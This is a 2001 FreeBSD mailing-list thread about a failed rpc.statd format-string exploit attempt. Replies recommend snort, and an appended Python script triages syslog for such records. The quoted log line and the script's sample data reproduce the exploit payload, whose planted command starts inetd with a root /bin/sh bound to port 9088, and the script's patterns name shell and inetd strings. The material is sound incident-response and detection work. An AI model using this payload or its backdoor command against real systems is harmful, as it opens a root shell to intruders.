Date:      Thu, 4 Jan 2001 11:37:32 -0500
From:      "Raymond Hicks" <rayhicks@UU.NET>
To:        "'Guy Helmer'" <ghelmer@palisadesys.com>
Cc:        <Eric_Stanfield@kenokozie.com>, <freebsd-questions@FreeBSD.ORG>
Subject:   RE: hack attempt (again) - help
Message-ID:  <003901c0766c$a3a06fc0$d7902799@sysenglt112>
In-Reply-To: <Pine.LNX.4.21.0101040951330.10523-100000@magellan.palisadesys.com>

Yes.. I didn't see that suggestion till after I replied... snort is my
recommendation as well..

-----Original Message-----
From: Guy Helmer [mailto:ghelmer@palisadesys.com]
Sent: Thursday, January 04, 2001 10:53 AM
To: Raymond Hicks
Cc: Eric_Stanfield@kenokozie.com; freebsd-questions@FreeBSD.ORG
Subject: RE: hack attempt (again) - help


On Thu, 4 Jan 2001, Raymond Hicks wrote:

> why dont you just run a sniffer?

snort is a sniffer with a lot of good stuff (TM) to find evil things.

> -----Original Message-----
> From: owner-freebsd-questions@FreeBSD.ORG
> [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Guy Helmer
> Sent: Thursday, January 04, 2001 10:26 AM
> To: Eric_Stanfield@kenokozie.com
> Cc: freebsd-questions@FreeBSD.ORG
> Subject: Re: hack attempt (again) - help
>
>
> On Thu, 4 Jan 2001 Eric_Stanfield@kenokozie.com wrote:
>
> > Alright this jerkoff has once again attempted to hack one of my freebsd
> > machines by trying what I assume is a buffer overflow to rpc:
> >
> > Jan  3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon:
> > ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x %08x %08x
> > %08x %08x %08x %08x %08x %08x %08x
> >
> > %0242x%n%055x%n%012x%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-
> > ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-
> > ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-
> > ^PëK^M-
> >
> > v¬M-^Cî M-^M^(M-^CÆ M-   ^°M-^Cî M-^M^.M-^CÆ M-^CÃ M-^Cë#M-  ^´1ÀM-^Cî
> > M-^HF'M-^HF*M-^CÆ M-^HF«M-    F¸°+, M-   óM-^MN¬M-^MV¸ÍM-^@1ÛM-
> > Ø@ÍM-^@è°ÿÿÿ/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >>
> > /tmp/m; /usr/sbin/inetd /tmp/m;
> >
> > The interesting bit is what he (she?) is attempting to sneak in at the end
> > of the garbage sent to the port.
> >
> > I've given the system a thorough check and this seems to have been a second
> > failed attempt.  I'm now annoyed, however, and would like to be able to at
> > least log what address this stuff is originating from.   Can anyone suggest
> > something from the ports that would do the trick?  I've disabled nfs/rpc
> > but I'm sure the hacker will come knocking again.
>
> snort with a current copy of the rule set from
> http://www.whitehats.com/ids/index.html ought to detect this (and lots of
> other script kiddie attempts).

--
Guy Helmer, Ph.D.
Sr. Software Engineer, Palisade Systems         ---
ghelmer@palisadesys.com
http://www.palisadesys.com/~ghelmer
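
The thread quotes a syslog line written by rpc.statd and asks how to learn where the traffic came from. As an added example (not code from the thread, from FreeBSD or from snort), here is a small Python triage script that parses BSD syslog lines, picks out rpc.statd "Invalid hostname to sm_mon" records, and scores the hostname field for the indicators visible in the quoted line: %n write directives and runs of %x, which mark a format-string attack rather than a plain buffer overflow; a NOP sled (0x90 bytes, rendered as M-^P in the post); and an embedded /bin/sh or inetd command. The sample log lines are constructed, the indicator names and thresholds are my own choices, and the payload text is a shortened stand-in for the bytes in the post.

```python
"""Triage BSD syslog lines for the rpc.statd sm_mon format-string pattern.

Added example, not code from the mailing-list thread. Indicator names and
thresholds are the author's assumptions, chosen from the quoted log excerpt.
"""
import re

# BSD syslog header: "Mon dd HH:MM:SS host program[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<prog>[^:\[\s]+)(?:\[\d+\])?: (?P<msg>.*)$"
)
SM_MON_MARKER = "Invalid hostname to sm_mon: "

# Indicators as (name, compiled regex, minimum hit count).
INDICATORS = [
    # %n writes to memory; it has no business in a hostname at all.
    ("format_write_%n", re.compile(r"%\d*n"), 1),
    # Runs of %x / %08x walk the stack; a handful in a row is enough.
    ("format_read_%x", re.compile(r"%\d*x"), 4),
    # NOP sled: raw 0x90 bytes or their cat -v rendering "M-^P".
    ("nop_sled", re.compile(r"(?:\x90|M-\^P){4,}"), 1),
    # A shell or inetd invocation smuggled into the hostname field.
    ("shell_command", re.compile(r"/bin/sh|/usr/sbin/inetd|\bnowait\b"), 1),
]

# Constructed sample log (shortened stand-in for the line quoted in the post).
SAMPLE_LOG = "\n".join([
    "Jan  3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon: "
    "%08x %08x %08x %08x %08x %08x %08x %08x%0242x%n%055x%n%012x%n%0192x%n"
    "M-^PM-^PM-^PM-^PM-^PM-^P/bin/sh -c echo \"9088 stream tcp nowait root "
    "/bin/sh -i\" >> /tmp/m; /usr/sbin/inetd /tmp/m;",
    # Benign noise from the same host (constructed).
    "Jan  3 23:20:01 mrtg sshd[411]: Accepted publickey for alice from 192.0.2.10 port 4242",
    # A malformed but harmless hostname must not fire.
    "Jan  3 23:21:10 mrtg rpc.statd: Invalid hostname to sm_mon: bad host name",
])


def parse_syslog(line):
    """Return the header fields of one syslog line, or None if it does not parse."""
    m = SYSLOG_RE.match(line)
    return m.groupdict() if m else None


def score_hostname(hostname):
    """Return {indicator: hit_count} for every indicator that reaches its threshold."""
    hits = {}
    for name, rx, minimum in INDICATORS:
        n = len(rx.findall(hostname))
        if n >= minimum:
            hits[name] = n
    return hits


def extract_command(hostname):
    """Best effort: return the trailing shell command (from the first '/bin/sh' on)."""
    i = hostname.find("/bin/sh")
    return hostname[i:] if i >= 0 else None


def triage(log_text):
    """Scan a syslog text; return one finding per suspicious sm_mon record."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        rec = parse_syslog(line)
        if not rec or rec["prog"] != "rpc.statd":
            continue
        if not rec["msg"].startswith(SM_MON_MARKER):
            continue
        hostname = rec["msg"][len(SM_MON_MARKER):]
        hits = score_hostname(hostname)
        if hits:
            findings.append({
                "line": lineno,
                "ts": rec["ts"],
                "host": rec["host"],
                "indicators": hits,
                "command": extract_command(hostname),
            })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"line {f['line']} {f['ts']} {f['host']}: {f['indicators']}")
        if f["command"]:
            print("  planted command:", f["command"])
```

Note what the script cannot do: the syslog record carries no source address, because rpc.statd only logged the hostname string it was handed, which is exactly why the answer in the thread is a packet-level tool such as snort rather than more log parsing. The script is for triaging logs already on disk and pulling out the planted command, so the affected host can be checked for the dropped file and an unexpected inetd process.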